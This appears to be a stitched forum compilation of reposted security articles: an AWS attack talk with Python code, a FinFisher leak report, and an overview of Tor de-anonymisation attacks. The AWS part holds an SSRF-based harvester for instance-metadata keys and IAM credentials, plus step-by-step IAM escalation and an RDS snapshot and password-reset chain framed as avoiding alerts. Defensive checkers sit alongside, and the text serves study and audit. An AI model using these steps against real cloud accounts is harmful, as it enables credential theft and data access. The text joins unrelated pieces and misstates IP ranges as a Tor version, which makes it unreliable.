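        "chmod 600 /root/.ssh/id_rsa\n"
        "git clone -b release git@github.com:example-org/webapp.git /srv/app\n"
    ),
    IAM_CREDS_PATH: "webapp-role",
    IAM_CREDS_PATH + "webapp-role": json.dumps({
        "Code": "Success",
        "Type": "AWS-HMAC",
        "AccessKeyId": "ASIAEXAMPLE000000001",
        "SecretAccessKey": "fakeSecretKeyMaterial/EXAMPLE",
        "Token": "fakeSessionToken==",
        "Expiration": "2013-11-21T12:00:00Z",
    }),
}


def fake_fetch(url: str) -> Optional[str]:
    """Simulated SSRF/RFI primitive: returns what the instance itself would get."""
    if not url.startswith(METADATA_BASE):
        return None
    return FAKE_METADATA.get(url[len(METADATA_BASE):])


PRIVATE_KEY_RE = re.compile(
    r"-----BEGIN [A-Z ]*PRIVATE KEY-----.*?-----END [A-Z ]*PRIVATE KEY-----",
    re.S)
# Captures (branch, url); branch is '' when the clone has no -b option.
REPO_RE = re.compile(r"git clone(?:\s+-b\s+(\S+))?\s+(\S+)")


def harvest(fetch: Callable[[str], Optional[str]]) -> dict:
    """Walk the metadata tree through `fetch` and collect the interesting parts."""
    found = {"deploy_keys": [], "repositories": [], "credentials": {}}
    user_data = fetch(METADATA_BASE + USER_DATA_PATH)
    if user_data:
        found["deploy_keys"] = PRIVATE_KEY_RE.findall(user_data)
        found["repositories"] = REPO_RE.findall(user_data)
    # The directory listing names the role(s); each role has a JSON document.
    roles = fetch(METADATA_BASE + IAM_CREDS_PATH)
    for role in (roles or "").split():
        body = fetch(METADATA_BASE + IAM_CREDS_PATH + role)
        creds = json.loads(body) if body else {}
        if creds.get("Code") == "Success":
            found["credentials"][role] = {
                k: creds[k] for k in ("AccessKeyId", "SecretAccessKey", "Token")}
    return found


def targets_metadata(url: str) -> bool:
    """Defender-side check for any URL-fetching feature: refuse IP-literal
    link-local targets. It is a minimum, not a complete fix: hostnames that
    resolve to 169.254.169.254 and alternative IP encodings slip past it."""
    host = urlsplit(url).hostname or ""
    try:
        return ipaddress.ip_address(host).is_link_local
    except ValueError:
        return False
```

The credentials come back with an expiration, so they are only useful until AWS rotates them; what does not rotate is the deploy key baked into user data, which is why keeping secrets out of user data (fetch them at boot from a store the instance profile is allowed to read, and nothing else) matters more than any single credential leak.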
The most common vulnerability that allows this type of access is a PHP Remote File Include, but any other vulnerable software which allows HTTP proxying could be used to retrieve the meta-data too.

Instance Profiles

It is common practice for applications running on EC2 instances to access AWS services like SQS or S3. For this to work the application needs access to AWS credentials. There are various ways to achieve this, but Amazon AWS recommends using instance profiles. Instance profiles are defined by the AWS architect, who decides which permissions will be available to the EC2 instances using the profile. For example, it is possible to create an instance profile with “SQS:*” permissions, which would allow access to all API calls in the SQS service. Once created, the instance profile is associated with an EC2 instance or a launch configuration. When the instances are started, AWS creates a unique set of access key, secret key and security token and makes them available to the instance through its meta-data. Most libraries which consume AWS services, such as boto, know how to retrieve the meta-data credentials and use them to access the AWS services. Since the instance profile credentials are stored in the meta-data, they suffer from the same risks as any other information stored there. Once those credentials are retrieved from the instance, they can be used from any other system with Internet access. The permissions available to the attacker using the stolen credentials will be the same as those of the EC2 instance, which makes it very important for the AWS administrator to apply the least privilege principle to all AWS permissions. It is also possible to enumerate the permissions with the nimbostratus tool introduced by Andres.

IAM:* Privilege Escalation

Amazon’s IAM service is used to manage users, groups, roles and permissions.
The permissions assigned to a group or user are fine grained; they are usually created using Amazon’s IAM policy generator and then set using Amazon’s IAM service. An AWS architect can create a custom permission set which allows access to the different AWS services such as SQS, RDS, EC2 and IAM itself. If the AWS architect does not take special care when assigning IAM permissions to a user, that user can use IAM API calls to elevate his privileges. Take a look at this example:
AWS user Alice only has privileges to access IAM API calls, IAM:* for short.
Alice uses those privileges to create a new user: Bob.
Alice creates a new inline policy with permissions to access all AWS services.
Alice attaches the newly created policy to Bob.
Alice creates access keys for the user Bob.
Alice accesses any AWS service using Bob’s credentials.

To run this attack Alice requires at least these IAM permissions:
CreateUser
CreateAccessKey
PutUserPolicy

It is important to note that the same goal could also be achieved with other calls to the IAM service: for example, it is possible to create a group, attach the policy to that group and then make the newly created user part of the group, or even make Alice herself part of the new high-privilege group.

Using AWS to access Virtualized Database Information

One of the most popular services provided by Amazon is RDS, which provides managed SQL databases. RDS reduces the management work required by database servers and makes scaling and high availability easy to achieve. SQL databases started from RDS can be managed using two very distinct methods:
the SQL database root user, connecting to the SQL server port (e.g. 3306 for MySQL)
Amazon’s RDS API, sending HTTPS requests to the RDS API endpoint

Each method allows the user to perform different actions on the database, its information and its users. Now imagine the following situation: an intruder got access to a set of AWS credentials. The credentials have permissions to access RDS:*.
The intruder has no other knowledge of, nor access to, the SQL DB running on RDS. Any knowledgeable intruder will identify three API calls which can be used to access the information stored in SQL databases managed by RDS: CreateDBSnapshot, RestoreDBInstanceFromDBSnapshot and ModifyDBInstance. The steps are trivial:
Use CreateDBSnapshot to create a backup of the RDS instance we want access to.
Use RestoreDBInstanceFromDBSnapshot to create a new RDS instance with all the information from the original one.
When the instance is running we still won’t be able to access it through the SQL server port, since we don’t have valid credentials for that. To solve that we call ModifyDBInstance, which changes the “root” (master) user’s password.
Using a SQL client (e.g. mysql-client in Ubuntu) the intruder connects to the DB as the “root” user with the password set in ModifyDBInstance.

Working on a restored copy matters: the production instance and its credentials are untouched, so nothing breaks and nobody is alerted. Please note that an intruder could also call ModifyDBInstance on the existing RDS instance and change the “root” password directly. That would also grant him “root” access to the SQL server, but it could be highly destructive and cause a denial of service if the application uses the root user to access the SQL database.

Tools

Andres Riancho will present tools created during his research. These tools help with the enumeration and exploitation of AWS misconfigurations (which is just another way of saying audit).

Who should attend?

Anyone seriously working with or considering Amazon Web Services (or any other kind of “cloud” infrastructure) has to attend this talk! The “cloud” is more than just virtualisation. You have to deal with the additional APIs and details it brings with it. The concepts discussed in this talk are especially important for penetration testers and auditors who attack or investigate “cloud” infrastructure.

Sursa: http://blog.deepsec.net/?p=1548
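Both chains above (the IAM escalation through CreateUser, CreateAccessKey and PutUserPolicy, and the RDS route through CreateDBSnapshot, RestoreDBInstanceFromDBSnapshot and ModifyDBInstance) reduce to the question an auditor asks of every policy: does it grant all the actions of a known chain? The following is an added example, not code from the talk or from the nimbostratus tool: a small evaluator that applies the documented IAM matching rules for Effect, Action/NotAction and wildcards to a policy document and reports which chains it enables. Resource and Condition elements are ignored, so a reported chain means "possible unless constrained further", which is what you then confirm against the live account. The sample policies are constructed.

```python
import fnmatch
from typing import Dict, List

# The two attack chains from the text, as the exact API actions each needs.
ESCALATION_CHAINS: Dict[str, List[str]] = {
    "iam-create-privileged-user": [
        "iam:CreateUser", "iam:CreateAccessKey", "iam:PutUserPolicy"],
    "rds-snapshot-clone-and-reset-password": [
        "rds:CreateDBSnapshot", "rds:RestoreDBInstanceFromDBSnapshot",
        "rds:ModifyDBInstance"],
}


def _as_list(value) -> list:
    """IAM lets most elements be a single value or a list of values."""
    if value is None:
        return []
    return [value] if isinstance(value, (str, dict)) else list(value)


def _matches(pattern: str, action: str) -> bool:
    """IAM action matching is case-insensitive and supports * and ? wildcards."""
    return fnmatch.fnmatchcase(action.lower(), pattern.lower())


def is_allowed(policy: dict, action: str) -> bool:
    """Explicit Deny wins over Allow; no matching statement is an implicit deny."""
    allowed = False
    for stmt in _as_list(policy.get("Statement")):
        if "Action" in stmt:
            hit = any(_matches(p, action) for p in _as_list(stmt["Action"]))
        else:  # NotAction: the statement applies to every action NOT listed
            hit = not any(_matches(p, action)
                          for p in _as_list(stmt.get("NotAction")))
        if not hit:
            continue
        if stmt.get("Effect") == "Deny":
            return False
        if stmt.get("Effect") == "Allow":
            allowed = True
    return allowed


def enabled_chains(policy: dict) -> List[str]:
    """Names of the chains for which every required action is allowed."""
    return [name for name, actions in ESCALATION_CHAINS.items()
            if all(is_allowed(policy, a) for a in actions)]


# Constructed sample policies.
IAM_ONLY = {"Version": "2012-10-17", "Statement": [
    {"Effect": "Allow", "Action": "iam:*", "Resource": "*"}]}

RDS_SNAPSHOTS_ONLY = {"Version": "2012-10-17", "Statement": [
    {"Effect": "Allow", "Action": ["rds:Describe*", "rds:CreateDBSnapshot"],
     "Resource": "*"}]}

# rds:* would enable the chain, but the explicit Deny on the password reset
# breaks it: the clone can be created but never logged into.
RDS_FULL_NO_MODIFY = {"Version": "2012-10-17", "Statement": [
    {"Effect": "Allow", "Action": "rds:*", "Resource": "*"},
    {"Effect": "Deny", "Action": "rds:ModifyDBInstance", "Resource": "*"}]}

EVERYTHING_BUT_IAM = {"Version": "2012-10-17", "Statement": {
    "Effect": "Allow", "NotAction": "iam:*", "Resource": "*"}}
```

The Deny-wins rule is what makes a narrow explicit Deny on rds:ModifyDBInstance (or on iam:PutUserPolicy) an effective tripwire even behind a broad Allow; the same evaluator can be pointed at the policies attached to an instance profile, which is exactly the set an attacker inherits from the stolen meta-data credentials.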
-
Documents on Legal Spyware “FinFisher” Leaked

August 6th, 2014, 16:58 GMT · By Ionut Ilascu

A set of files has been posted online detailing the capabilities and features of the “FinFisher” spyware suite (also known as FinSpy), a package sold by a German company called Gamma Group to governments and law enforcement agencies. The documentation was published through a Twitter account that purports to be from the company’s PR department; however, the account, operated by someone with the handle Phineas Fisher, is not affiliated with Gamma Group. The information contained in the files is quite recent; the newest of them, dated April 14, 2014, are release notes for FinSpyPC and FinSpyMobile 4.51. The mobile version of the spyware can monitor various communication channels (calls, short text messages, multimedia messages) and access stored data (the address book). Moreover, it can place silent calls in order to listen to the microphone remotely. Another document states that FinFisher for PC bypasses detection by almost 40 regularly tested antivirus products. It is unclear which antivirus solutions the spyware was tested against, but a tweet from Phineas Fisher (@GammaGroupPR) on August 3 showed that Avast’s product could detect its presence on an infected system. An update to the desktop version released in April included modifications that allowed the rootkit component to evade security solutions such as the ones from Avast and Microsoft Security Essentials. Another change referred to the Skype module of the malware: “make the appropriate modifications to avoid the popup Skype brings when the Trojan Skype module injects code into Skype.” A list of limitations is also available, and it appears that the modern (Metro) version of Skype on Windows 8 is not supported.
However, the document is dated April 14, 2014, and there is a good chance that Gamma Group has since developed an updated version that removes this restriction. The tongue-in-cheek Twitter account offers links to a price list for the legal malware developed for governments. It seems that customers paid almost €1.5 million / $2 million for the software package, while practical penetration testing cost up to €27,000 / $36,000. Multiple services and packages are offered, and purchasing all of them could cost a customer close to €3 million / $4 million. The mock reason given for creating the Twitter account and leaking the documents is that Gamma International ran out of governments to sell its spyware to and opened sales to the public in order to stay in business.

Here at Gamma International, we've run out of governments to sell to, so we're opening up sales to the general public!
— Phineas Fisher (@GammaGroupPR) August 3, 2014

Sursa: Documents on Legal Spyware “FinFisher” Leaked
-
Hacking Tor and Online Anonymity

Introduction

Tor is the acronym of “The Onion Router”, a system implemented to preserve online anonymity. The Tor client software routes Internet traffic through a worldwide volunteer network of servers that hide user information, evading surveillance by governments and other bad actors. The Tor project was born in the military sector, sponsored by the US Naval Research Laboratory, and from 2004 to 2005 it was supported by the Electronic Frontier Foundation. Today the software is developed and maintained by the Tor Project team. The encryption implemented in the Tor network protects users’ privacy: Tor traffic is encrypted multiple times as it passes through different nodes of the network, also known as Tor relays. Law enforcement and intelligence agencies all over the world are spending considerable effort trying to break the encryption used by Tor, and practically every government is trying to infiltrate the network to de-anonymize its users. The Tor network is widely used by digital activists and individuals in many critical regions to evade the Internet censorship operated by the governments of China, Syria, Bahrain and Iran. According to Tor Metrics, 2.5 million people worldwide directly access the anonymizing network.

Figure – Users directly connected to Tor network

This post gives an overview of recent events regarding Tor and the attacks on its infrastructure, with explicit reference to the principal initiatives conducted by governments to de-anonymize Tor users.

Governments vs Tor

Governments are spending great effort to improve their monitoring capabilities. Tor and other anonymizing networks represent an obstacle to Internet monitoring.
Governments maintain that technologies like Tor are abused by cybercriminals and terrorists and are a potential source of threats, while organizations defending online privacy and freedom of expression maintain that intelligence agencies are trying to extend their monitoring capabilities over anonymizing networks.

Russian Government wants to crack Tor

Intelligence agencies have declared war on the anonymizing network. Edward Snowden revealed months ago that US intelligence is worried about possible misuses of the Tor network and is investing in compromising it. The Russian government, too, is actively working to crack Tor and de-anonymize its users. The Ministry of the Interior of the Russian Federation (MVD) has recently started an initiative to “study the possibility of obtaining technical information about users (user equipment) of Tor anonymous network”. The Russian government has issued a tender to recruit companies and organizations interested in developing the technology to track users and their activities within the Tor network. The authorities are offering nearly 4 million rubles, approximately $111,000, for the development of technology to decrypt data sent over Tor and identify Tor users. The tender, titled “Perform research, code ‘TOR’ (Navy),” was posted on July 11th on the official procurement website.

Figure – Competition promoted by the Ministry of the Interior of the Russian Federation (MVD)

Officially the Kremlin supports similar projects “in order to ensure the country’s defense and security”. Russian intelligence fears that anonymizing networks could be used by terrorists and foreign intelligence to conspire against the government in Moscow. A few days ago I asked a colleague to help me translate the original tender; the spelling “TOP” comes from that original document (all-caps Cyrillic, read as a Russian transliteration). The tender is indeed about Tor, and the term “Scientific Production Association” is a Soviet/Russian cover term for a military or KGB/FSB R&D outlet. The one in question belongs to the Interior Ministry, which is in charge of the police and the penitentiary system. The tender requires an active security clearance, specifically for lawful interception (LI) work (though I wonder if “legal” is applicable to Russia at all), and a general high-level security clearance. Every company that wants to participate in the initiative has to pay a 195,000 ruble (about $5,555) application fee.

Who is spying on Tor network exit nodes from Russia?

The researchers Philipp Winter and Stefan Lindskog of Karlstad University in Sweden presented the results of a four-month study conducted to test Tor network exit nodes for sneaky behavior. They noticed that an unidentified Russian entity is eavesdropping on nodes at the edge of the Tor network. Their investigation rests on the fact that exit relays are in a position to snoop on and tamper with anonymized network traffic, and the researchers worked to define a methodology to expose malicious exit relays and document their actions. They used a custom tool, a “fast and modular exit relay scanner”, for their analysis, and they discovered that the entity appeared to be particularly interested in users’ Facebook traffic. They designed several scanning modules for detecting common attacks and used them to probe all exit relays. “We are able to detect and thwart many man-in-the-middle attacks which makes the network safer for its users,” they reported in the paper describing their research. Winter and Lindskog identified 25 nodes that tampered with web traffic, decrypted the traffic, or censored websites. Of those, 19 were running man-in-the-middle attacks on users, decrypting and re-encrypting traffic on the fly.
Figure – Tor network infiltrated by malicious nodes

The Tor network anonymizes users’ web experience, under specific conditions, by bouncing encrypted traffic through a series of nodes before reaching the web site through one of over 1,000 “exit nodes”. The study rests on two fundamental considerations:
Users’ traffic is vulnerable at the exit nodes. Transit through an exit node exposes the traffic to eavesdropping by bad actors. A well-known case is WikiLeaks, which was initially launched with documents intercepted by eavesdropping on Chinese hackers through a bugged Tor exit node.
Tor nodes are run by volunteers who can easily set up and take down their servers whenever they need or want to.

The attackers in the 19 MITM cases used a bogus digital certificate to access the traffic content. For the remaining six cases, the impairment was found to result from configuration mistakes or ISP issues. The study revealed that the nodes used to tamper with the traffic were configured to intercept only data streams for specific websites, including Facebook, probably to avoid detection of their activity. The researchers passively eavesdropped on unencrypted web traffic at the exit nodes. By checking the digital certificates presented over Tor connections against the certificates seen in direct “clear-web” sessions, they discovered numerous exit nodes located in Russia that were used to perform man-in-the-middle attacks. The attackers controlling the Russian nodes access the traffic and re-encrypt it with their own self-signed digital certificate, issued to the made-up entity “Main Authority”. It is difficult to attribute responsibility for these attacks. The researchers speculated that the attacks are part of a sophisticated operation conducted to de-anonymize the Tor network. The experts also noticed that when the “Main Authority” Tor nodes were blacklisted, new ones using the same certificate would be set up by the same entity.
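The core of the Winter and Lindskog method, fetching the same site through each exit relay and comparing the certificate presented with the one a direct connection gets, as an added example that is not the researchers’ scanner: a comparison over a constructed set of observations (relay and certificate fingerprints are invented; “Main Authority” is the issuer name from the study). The second function applies the observation above that replacement relays reused the same forged certificate, by grouping flagged relays on the certificate they share.

```python
from collections import defaultdict
from typing import Dict, List, Tuple

# Constructed observations, one per (exit relay, site): the leaf certificate
# seen through that exit and its issuer. Fingerprints are invented.
Observation = Tuple[str, str, str, str]  # (relay, site, cert_fingerprint, issuer)
OBSERVATIONS: List[Observation] = [
    ("AAAA1111", "www.facebook.com", "sha256:f4c3b00c", "Example Root CA"),
    ("BBBB2222", "www.facebook.com", "sha256:deadbeef", "Main Authority"),
    ("CCCC3333", "www.facebook.com", "sha256:deadbeef", "Main Authority"),
    ("CCCC3333", "example.org",      "sha256:0badc0de", "Main Authority"),
    ("DDDD4444", "example.org",      "sha256:ab12cd34", "Example Root CA"),
    ("EEEE5555", "www.facebook.com", "sha256:f4c3b00c", "Example Root CA"),
]
# What the same sites present on a direct (non-Tor) connection, constructed.
DIRECT_CERTS: Dict[str, str] = {
    "www.facebook.com": "sha256:f4c3b00c",
    "example.org": "sha256:ab12cd34",
}


def suspicious_exits(observations: List[Observation],
                     direct: Dict[str, str]) -> Dict[str, List[Tuple[str, str, str]]]:
    """Exit relays that presented a certificate differing from the direct one.
    A mismatch means something between the exit and the site (or the exit
    itself) terminated TLS and re-encrypted the session."""
    flagged: Dict[str, List[Tuple[str, str, str]]] = defaultdict(list)
    for relay, site, seen, issuer in observations:
        expected = direct.get(site)
        if expected is not None and seen != expected:
            flagged[relay].append((site, seen, issuer))
    return dict(flagged)


def clusters_by_forged_cert(observations: List[Observation],
                            direct: Dict[str, str]) -> Dict[str, List[str]]:
    """Group flagged relays by the forged certificate they share. The same
    certificate showing up on several relays, including ones that appear
    after others were blacklisted, points at a single operator."""
    groups: Dict[str, set] = defaultdict(set)
    for relay, hits in suspicious_exits(observations, direct).items():
        for _site, seen, _issuer in hits:
            groups[seen].add(relay)
    return {cert: sorted(relays) for cert, relays in groups.items()
            if len(relays) > 1}
```

On real traffic a leaf mismatch alone is a lead rather than proof, because large sites rotate certificates and serve different ones from different CDN nodes; the strong signal is a mismatch combined with an issuer no browser trusts, which is what the self-signed “Main Authority” certificate gave away.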
The experts rule out that a government agency conducted the attack, because the technique adopted is too noisy; they suspect that a group of individuals acting on their own is responsible for the anomalous activity. One of the noisiest choices of the attackers is the use of self-signed certificates, which cause a browser warning for Tor users when they visit the targeted websites and fall victim to the MITM attack. “It was actually done pretty stupidly,” says Winter.

The National Security Agency wants to overwhelm Tor Anonymity

American whistleblower Edward Snowden released a collection of classified NSA documents titled “Tor Stinks”, which explain how the NSA has developed the capability to de-anonymize a small fraction of Tor users through manual analysis. Tor Stinks is not an architecture for large-scale surveillance, but it allows US agents to track specific individuals as they navigate the Tor network. “We will never be able to de-anonymize all Tor users all the time, [but] with manual analysis we can de-anonymize a very small fraction of Tor users,” one of the disclosed slides reports. In reality the intelligence agency is doing much more, trying to compromise the entire Tor network and degrading the user experience to dissuade people from using it.

Figure – NSA Tor Stinks Project to overwhelm Tor Anonymity

The NSA is working in different ways to reach its goals. Its strategy to unhinge Tor anonymity relies on the following principles: it runs malicious Tor nodes to infiltrate the Tor network, and at the same time it tries to exploit unknown flaws in every component of the anonymizing architecture, on both the client and the server side. The slides leaked by Snowden on the Tor Stinks project reveal that the NSA is conducting the following operations:
Infiltrating the Tor network by running its own Tor nodes. Both the NSA and GCHQ run Tor nodes to track traffic back to a specific user.
The method is based on reconstructing the circuit from knowledge of the entry, relay and exit nodes between the user and the destination website.
Exploiting a zero-day vulnerability in the Firefox browser bundled with Tor. With this technique the NSA was able to get the user’s IP address. In the same way the FBI arrested the owner of the Freedom Hosting service provider, accused of aiding and abetting child pornography.
Using web cookies to track Tor users widely. The technique is effective against the Tor Browser too. Cookies are used to analyze the user’s activity on the Internet: the intelligence agency owned or controlled a series of websites that were able to read the cookies last stored by the browser on the victim’s machine. With this technique the agency collects the user’s data, including the IP address.

Of course, expert users can avoid this type of control in numerous ways, for example by using a dedicated browser exclusively for Tor browsing, using only the official preconfigured Tor bundle, or properly managing the cookies stored on their machine. Unfortunately, the surveillance methods appear effective against a huge number of individuals. I always suggest using a virtual machine with a live OS to protect your Tor anonymity; this way, cache and cookies are lost once the machine is shut down. Documents leaked by Snowden show that the NSA uses online advertisements, i.e. Google Ads, to make its tracking sites popular on the Internet.

German public broadcaster ARD recently published a report on the use of the XKeyscore platform to compromise Tor anonymity. The broadcaster reported that two Germany-based Tor Directory Authority servers have been targeted by US intelligence. ARD published the source code from XKeyscore for the first time, although it did not provide information on its origin or how it was received.
XKeyscore gives the “widest-reaching” collection of online data, analyzing the content of emails, social media and browsing history. In July 2013, The Guardian published an exclusive report on the NSA surveillance program, providing several NSA training slides from the secret program. Facebook chats and private messages become accessible to intelligence analysts simply by providing the Facebook user name and a date range for the investigation. XKeyscore in fact provides the instruments necessary for analyses that are conducted without any legal authorization or warrant. “A top secret National Security Agency program allows analysts to search with no prior authorization through vast databases containing emails, online chats and the browsing histories of millions of individuals, according to documents provided by whistleblower Edward Snowden.” The NSA boasts in training materials that the program, called XKeyscore, is its “widest-reaching” system for developing intelligence from the Internet. The source code published by ARD demonstrates that the NSA tracks people who are believed to live outside the US and who request Tor bridge information via e-mail, or who search for or download Tor or the TAILS live operating system; the NSA was able to record their IP addresses. The XKeyscore rules analyzed by the experts include the IP addresses of the targeted Tor Directory Authorities, part of the backbone of the Tor network. These authorities are updated every hour with information about new Tor relays. The post also explains that its authors, including the well-known expert Jacob Appelbaum, were themselves targeted by XKeyscore. “Their research in this story is wholly independent from the Tor Project and does not reflect the views of the Tor Project in any way … During the course of the investigation, it was further discovered that an additional computer system run by Jacob Appelbaum for his volunteer work with helping to run part of the Tor network was targeted by the NSA.
Moreover, all members of this team are Tor users and appear to have been targets of the mass surveillance described in the investigation,” ARD stated. Looking deeper into the source code, one can verify that the NSA is also targeting users of the anonymous remailer Mixminion:

/**
 * Placeholder fingerprint for Tor hidden service addresses.
 * Real fingerpritns will be fired by the plugins
 * 'anonymizer/tor/plugin/onion/*'
 */
fingerprint('anonymizer/tor/hiddenservice/address') = nil;
// END_DEFINITION

// START_DEFINITION
appid('anonymizer/mailer/mixminion', 3.0, viewer=$ascii_viewer) =
    http_host('mixminion') or ip('128.31.0.34');
// END_DEFINITION

Law enforcement agencies, the Tor network and cybercrime

De-anonymization of Tor network users is also a goal of law enforcement agencies, which need to track users in order to identify and prevent illicit activities. Last year the FBI revealed that experts at the Bureau had compromised the Freedom Hosting company during an investigation of child pornography. Freedom Hosting was probably the most popular Tor hidden service hosting company. The FBI used a malicious script that took advantage of a Firefox zero-day to identify some users of the Tor anonymity network. In an Irish court, FBI Supervisory Special Agent Brooke Donahue revealed that the FBI had taken control of the Freedom Hosting company to investigate child pornography activities. Freedom Hosting was considered by US law enforcement to be the largest child porn facilitator on the planet. For its analysis, the FBI exploited a Firefox zero-day (MFSA 2013-53) in Firefox 17, also confirmed by Mozilla, that allowed it to track Tor users. It exploited the flaw in the Tor Browser to implant a tracking cookie which fingerprinted suspects through a specific external server.
“Security researcher Nils reported that specially crafted web content using the onreadystatechange event and reloading of pages could sometimes cause a crash when unmapped memory is executed. This crash is potentially exploitable.” The exploit is delivered as JavaScript carrying a tiny Windows payload in a variable dubbed “Magneto”. The Magneto code looks up the victim’s Windows hostname and MAC address and sends the information back to an FBI server in Virginia, exposing the victim’s real IP address: the script sends the data with a standard HTTP web request that goes outside the Tor network.

Figure – Magneto script used by FBI

The investigation led to the identification and arrest of Eric Eoin Marques, the 28-year-old Irish owner and operator of Freedom Hosting. Freedom Hosting hosted hundreds of websites, many of them used to conduct illegal activities taking advantage of the anonymity provided by the Tor network. Tor is also used by cybercriminals to conduct illicit activities such as money laundering, exchange of child porn material, hacking-for-hire services, and the sale of drugs and weapons. Freedom Hosting was offering hosting services to criminal gangs which were moving their business into the Deep Web; consider that hundreds of hacking sites such as HackBB were hosted by the company. Donahue revealed that the Freedom Hosting service hosted at least 100 child porn sites, providing illegal content to thousands of users, and claimed that Marques had visited some of the sites himself. Eric Eoin Marques knew he was being hunted; apparently he sent his earnings to his girlfriend in Romania. Analyzing Marques’s seized computer, the FBI discovered that he had made inquiries about how to get a visa and entry into Russia, as well as residency and citizenship in the country. Marques also searched for a US passport template and a US passport hologram star. He was probably planning an escape.
Court documents and FBI files released under the FOIA describe the CIPAV (Computer and Internet Protocol Address Verifier) as software the FBI can deliver through a browser exploit to gather information from the suspect’s machine and send it to the Bureau’s server in Virginia. The event confirms that the Tor network provides an extra layer of obfuscation, but it must be clear that it does not provide bulletproof online anonymity. Many researchers have demonstrated that it is possible to de-anonymize users by exploiting a flaw in the protocol itself or in one of the numerous applications used with it, such as the web browser or the live distribution.

Break Tor network anonymity with just $3000

It is a common belief that de-anonymizing the Tor network requires a great effort in terms of resources and computational capabilities. Many security experts have started to investigate the possibility that US intelligence and others have found a way to compromise the Tor network. A few weeks ago, two researchers, Alexander Volynkin and Michael McCord, claimed to be able to de-anonymize Tor users easily. They announced that they would present the results of their study at Black Hat 2014, but a few days ago they canceled their participation in the event. “Unfortunately, Mr Volynkin will not be able to speak at the conference since the materials that he would be speaking about have not yet [been] approved by Carnegie Mellon University/Software Engineering Institute for public release,” states the message posted on the official website of the event. Christopher Soghoian, principal technologist with the American Civil Liberties Union, has speculated that the researchers might have feared criminal prosecution for illegal monitoring of Tor exit traffic. “Monitoring Tor exit traffic is potentially a violation of several federal criminal statutes,” he added.
The researchers were preparing a presentation, YOU DON’T HAVE TO BE THE NSA TO BREAK TOR: DEANONYMIZING USERS ON A BUDGET, explaining how to identify Tor users with a very small budget, just $3,000. “There is nothing that prevents you from using your resources to de-anonymize the network’s users instead by exploiting fundamental flaws in Tor design and implementation. And you don’t need the NSA budget to do so. Looking for the IP address of a Tor user? Not a problem. Trying to uncover the location of a Hidden Service? Done. We know because we tested it, in the wild … In this talk, we demonstrate how the distributed nature, combined with newly discovered shortcomings in design and implementation of the Tor network, can be abused to break Tor anonymity,” is how the two researchers described their work. According to the researchers, it is possible to de-anonymize users with a limited budget. The worrying news is that a persistent adversary like an intelligence agency “with a handful of powerful servers and a couple gigabit links can de-anonymize hundreds of thousands of Tor clients and thousands of hidden services within a couple of months.” The discovery made by the researchers, even though it was never publicly disclosed, seems to confirm that the popular anonymizing network is affected by serious flaws that could be exploited by attackers to track users. One of the creators of the Tor project, Roger Dingledine, speaking of the discovery announced by the two researchers, admitted that the Tor Project had been “informally” shown some of the materials that would have been presented. “In response to our questions, we were informally shown some materials. We never received slides or any description of what would be presented in the talk itself beyond what was available on the BlackHat Webpage. I think I have a handle on what they did, and how to fix it.
We’ve been trying to find delicate ways to explain that we think we know what they did, but also it sure would have been smoother if they’d opted to tell us everything. The main reason for trying to be delicate is that I don’t want to discourage future researchers from telling us about neat things that they find. I’m currently waiting for them to answer their mail so I can proceed … Based on our current plans, we’ll be putting out a fix that relays can apply that should close the particular bug they found. The bug is a nice bug, but it isn’t the end of the world,” he added. Dingledine’s words confirm that there is a flaw in the Tor architecture that the two researchers probably exploited. This means that the software may already have been compromised in the past by intelligence agencies.

Ongoing attacks

As discussed in the previous paragraphs, law enforcement, intelligence agencies and individuals are interested in de-anonymizing Tor users for various purposes. Now it is time to analyze a real ongoing attack and explain the attackers’ modus operandi. On July 30th, the members of the Tor Project published a security advisory on the official website revealing that earlier in the month, on July 4th, 2014, they had found a group of relays that appeared to be trying to de-anonymize users. The experts at the Tor Project noticed that the bad actors were targeting relays to track users operating or accessing Tor hidden services. “They appear to have been targeting people who operate or access Tor hidden services. The attack involved modifying Tor protocol headers to do traffic confirmation attacks. The particular confirmation attack they used was an active attack where the relay on one end injects a signal into the Tor protocol headers, and then the relay on the other end reads the signal.
These attacking relays were stable enough to get the HSDir (“suitable for hidden service directory”) and Guard (“suitable for being an entry guard”) consensus flags. Then they injected the signal whenever they were used as a hidden service directory, and looked for an injected signal whenever they were used as an entry guard.”

The technique is as simple as it is efficient. The attack is possible when the attacker controls or observes the relays on both ends of a Tor circuit and then compares traffic timing, volume, or other characteristics to conclude that the two relays are part of the same circuit, which routes information from source to destination. The first relay in the circuit (“entry guard”) knows the IP address of the user, and the last relay in the circuit (“exit node”) knows the resource or destination the user is accessing. The attacker is then able to de-anonymize Tor users.

Attackers were leveraging a critical flaw in the Tor architecture to modify protocol headers in order to perform a traffic confirmation attack, injecting a special code into the protocol header that the attackers used to compare certain metrics from the relays to de-anonymize users. 115 malicious fast non-exit relays (6.4% of the whole Tor network) were involved in the attack. The servers were actively monitoring the relays on both ends of a Tor circuit in an effort to de-anonymize users. The malicious relays were running Tor version 50.7.0.0/16 or 204.45.0.0/16 and bad actors were using them trying to de-anonymize Tor users who visit and run so-called hidden services. The malicious relays joined the Tor network on January 30th, 2014 and experts at the Tor Project removed them from the network on July 4th, 2014. The members of the Tor project team also advised hidden service operators to change the location of their hidden service.
“While we don’t know when they started doing the attack, users who operated or accessed hidden services from early February through July 4 should assume they were affected,” Tor said.

When users access the Tor network with the Tor software, their IP address is not visible and it appears to the Internet as the IP address of a Tor exit relay, which can be anywhere. Bad actors who were running the confirmation attack were looking for users who fetched hidden service descriptors. This means that the attackers were not able to see pages loaded by users, nor whether users visited the hidden service they looked up. “The attack probably also tried to learn who published hidden service descriptors, which would allow the attackers to learn the location of that hidden service. In theory the attack could also be used to link users to their destinations on normal Tor circuits too, but we found no evidence that the attackers operated any exit relays, making this attack less likely. And finally, we don’t know how much data the attackers kept, and due to the way the attack was deployed (more details below), their protocol header modifications might have aided other attackers in de-anonymizing users too,” states the security advisory.

In order to close the critical flaw, the Tor Project team is suggesting that Tor relay operators upgrade the Tor software to a recent release, either 0.2.4.23 or 0.2.5.6-alpha. The Tor Project released a software update to prevent such attacks.

Conclusions

Law enforcement agencies and intelligence are spending a great effort to de-anonymize the user experience on the Tor network, to discourage the use of anonymizing networks. Attackers can follow two directions:
Try to break the encryption used to anonymize the traffic.
Try to exploit flaws in one of the numerous components present in the anonymizing architecture.
As demonstrated by recent attacks on anonymizing software like the Tails live distribution, the second choice is probably the most suitable.
